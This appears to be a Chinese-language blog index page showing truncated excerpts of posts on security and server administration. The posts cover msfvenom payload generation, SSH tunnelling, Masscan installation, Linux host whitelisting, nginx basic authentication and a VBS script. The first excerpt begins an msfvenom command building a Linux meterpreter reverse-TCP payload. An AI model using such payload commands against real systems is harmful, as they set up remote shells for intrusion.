msfvenom生成各类Payload命令 List payloadsmsfvenom -lBinariesLinuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPOR... 阅读全文
linux服务器设置白名单 vi /etc/hosts.allow sshd:10.0.0.x:allow # 单个ip sshd:192.168.7.0/255.255.248.0:allow #一个网段的设置完之后还要设置拒绝所有 IP(白名单除外)v... 阅读全文
nginx 配置401认证 1.将下面这段配置写入server里或者location里面都可以。auth_basic "Login In:"; auth_basic_user_file /etc/nginx/pass; #存用户名和密码的文件2.生成pass文件... 阅读全文
Masscan 安装配置在Debian/Ubuntu系统中,安装方法如下:$ sudo apt-get install git gcc make libpcap-dev$ git clone https://github.com/robertdavi... 阅读全文
SSH 常见的三种转发和代理命令 主要三个命令ssh -C -f -N -g -L local_ip:local_port:remote_ip:remote_port user@remoteip ssh -C -f -N -g -R remote_ip:remote... 阅读全文
无聊时的VBS脚本 无聊写了一段代码.VBS的.纯出无聊,写着玩意.... 只希望快点从某些难过的情绪里走出来.... 分割线以下的代码直接复制到文本中(文本?就是TXT格式的文件啊),保存,再然后把文本的后缀名txt改成VBS,你自己双击打开试试. -... 阅读全文